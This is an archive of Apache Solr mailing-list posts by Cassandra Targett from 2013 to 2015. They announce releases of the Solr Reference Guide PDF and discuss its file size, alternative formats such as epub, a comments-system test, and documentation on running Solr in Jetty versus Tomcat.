2015-12-15 Thread Cassandra Targett
The Lucene PMC is pleased to announce the release of the Apache Solr
Reference Guide for Solr 5.4.

This 598 page PDF is the definitive guide for Solr, written and edited by
the Solr committer community. You can download it from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

- Cassandra


Re: ctargett commented on http://people.apache.org/~ctargett/RefGuidePOC/current/Index-Replication.html

2015-09-21 Thread Cassandra Targett
Hey folks,

I'm doing some experiments with other formats for the Ref Guide and playing
around with options for comments. I didn't realize this old experiment from
https://issues.apache.org/jira/browse/SOLR-4889 would send email - I'm
talking to Steve Rowe to see if we can get that disabled.

Cassandra

On Mon, Sep 21, 2015 at 2:06 PM,  wrote:

> Hello,
> ctargett has commented on
> http://people.apache.org/~ctargett/RefGuidePOC/current/Index-Replication.html
> .
> You can find the comment here:
>
> http://people.apache.org/~ctargett/RefGuidePOC/current/Index-Replication.html#comment_4535
> Please note that if the comment contains a hyperlink, it must be
> approved
> before it is shown on the site.
>
> Below is the reply that was posted:
> 
> This is a test of the comments system.
> 
>
> With regards,
> Apache Solr Cwiki.
>
> You are receiving this email because you have subscribed to changes
> for the solrcwiki site.
> To stop receiving these emails, unsubscribe from the mailing list that
> is providing these notifications.
>
>


ANNOUNCE: Apache Solr Reference Guide for Solr 5.3 released

2015-08-25 Thread Cassandra Targett
The Lucene PMC is pleased to announce the release of the Solr Reference
Guide for Solr 5.3.

This 577 page PDF is the definitive guide for using Apache Solr and can be
downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

If you have


ANNOUNCE: Apache Solr Reference Guide for Solr 4.9 available

2014-06-30 Thread Cassandra Targett
The Lucene PMC is pleased to announce the availability of the Apache Solr
Reference Guide for Solr 4.9. The 408 page PDF is the definitive user
manual for Solr 4.9.

The Solr Reference Guide can be downloaded from the Apache mirror network:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

Cassandra


Re: ANNOUNCE: Apache Solr Reference Guide for 4.7

2014-03-05 Thread Cassandra Targett
You know, I didn't even notice that. It did go up to 30M.

I've made a note to look into that before we release the 4.8 version to see
if it can be reduced at all. I suspect the screenshots are causing it to
balloon - we made some changes to the way they appear in the PDF for 4.7
which may be the cause, but also the software was upgraded and maybe the
newer version is handling them differently.

Thanks for pointing that out.


On Tue, Mar 4, 2014 at 6:43 PM, Alexandre Rafalovitch arafa...@gmail.com wrote:

 Has it really gone up in size from 5Mb for 4.6 version to 30Mb for 4.7
 version? Or some mirrors are playing tricks (mine is:
 http://www.trieuvan.com/apache/lucene/solr/ref-guide/ )

 Regards,
Alex.
 Personal website: http://www.outerthoughts.com/
 LinkedIn: http://www.linkedin.com/in/alexandrerafalovitch
 - Time is the quality of nature that keeps events from happening all
 at once. Lately, it doesn't seem to be working.  (Anonymous  - via GTD
 book)


 On Wed, Mar 5, 2014 at 1:39 AM, Cassandra Targett ctarg...@apache.org
 wrote:
  The Lucene PMC is pleased to announce that we have a new version of the
  Solr Reference Guide available for Solr 4.7.
 
  The 395 page PDF serves as the definitive user's manual for Solr 4.7. It
  can be downloaded from the Apache mirror network:
 
  https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/
 
  Cassandra



ANNOUNCE: Apache Solr Reference Guide for 4.7

2014-03-04 Thread Cassandra Targett
The Lucene PMC is pleased to announce that we have a new version of the
Solr Reference Guide available for Solr 4.7.

The 395 page PDF serves as the definitive user's manual for Solr 4.7. It
can be downloaded from the Apache mirror network:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/

Cassandra


Re: [ANNOUNCE] Apache Solr Reference Guide 4.5 Available

2013-11-19 Thread Cassandra Targett
I've often thought of possibly providing the reference guide in .epub
format, but wasn't sure of general interest. I also once tried to
convert the PDF version with calibre and it was a total mess - but
PDF is probably the least-flexible starting point for conversion.

Unfortunately, the Word export is only available on a per-page basis,
which would make it really tedious to try to make a .doc version of
the entire guide (there are ~150 pages). There are, however, options
for HTML export, which I believe could be converted to .epub - but
might take some fiddling.

I created an issue for this - for now just to track that it's
something that might be of interest - but not sure if/when I'd
personally be able to work on it:
https://issues.apache.org/jira/browse/SOLR-5467.

On Tue, Nov 19, 2013 at 6:34 AM, Uwe Reh r...@hebis.uni-frankfurt.de wrote:
 On 18.11.2013 at 14:39, Furkan KAMACI wrote:

 Atlassian Jira has two options by default: exporting to PDF and exporting
 to Word.


 I see, 'Word' isn't optimal for a reference guide. But OO can handle 'doc'
 and has epub plugins.
 Could it be possible to offer the documentation also as 'doc(x)'?

 barefaced
 Uwe



Re: difference between apache tomcat vs Jetty

2013-10-25 Thread Cassandra Targett
In terms of adding or fixing documentation, the Installing Solr page
(https://cwiki.apache.org/confluence/display/solr/Installing+Solr)
includes a yellow box that says:

Solr ships with a working Jetty server, with optimized settings for
Solr, inside the example directory. It is recommended that you use the
provided Jetty server for optimal performance. If you absolutely must
use a different servlet container then continue to the next section on
how to install Solr.

So, it's stated, but maybe not in a way that makes it clear to most
users. And maybe it needs to be repeated in another section.
Suggestions?

I did find this page,
https://cwiki.apache.org/confluence/display/solr/Running+Solr+on+Jetty,
which pretty much contradicts the previous text. I'll fix that now.

Other recommendations for where doc could be more clear are welcome.

On Thu, Oct 24, 2013 at 7:14 PM, Tim Vaillancourt t...@elementspace.com wrote:
 Hmm, that's an interesting move. I'm on the fence on that one but it surely
 simplifies some things. Good info, thanks!

 Tim


 On 24 October 2013 16:46, Anshum Gupta ans...@anshumgupta.net wrote:

 Thought you may want to have a look at this:

 https://issues.apache.org/jira/browse/SOLR-4792

 P.S: There are no timelines for 5.0 for now, but it's the future
 nevertheless.



 On Fri, Oct 25, 2013 at 3:39 AM, Tim Vaillancourt t...@elementspace.com
 wrote:

  I agree with Jonathan (and Shawn on the Jetty explanation), I think the
  docs should make this a bit more clear - I notice many people choosing
  Tomcat and then learning these details after, possibly regretting it.
 
  I'd be glad to modify the docs but I want to be careful how it is worded.
  Is it fair to go as far as saying Jetty is 100% THE recommended
 container
  for Solr, or should a recommendation be avoided, and maybe just a list of
  pros/cons?
 
  Cheers,
 
  Tim
 



 --

 Anshum Gupta
 http://www.anshumgupta.net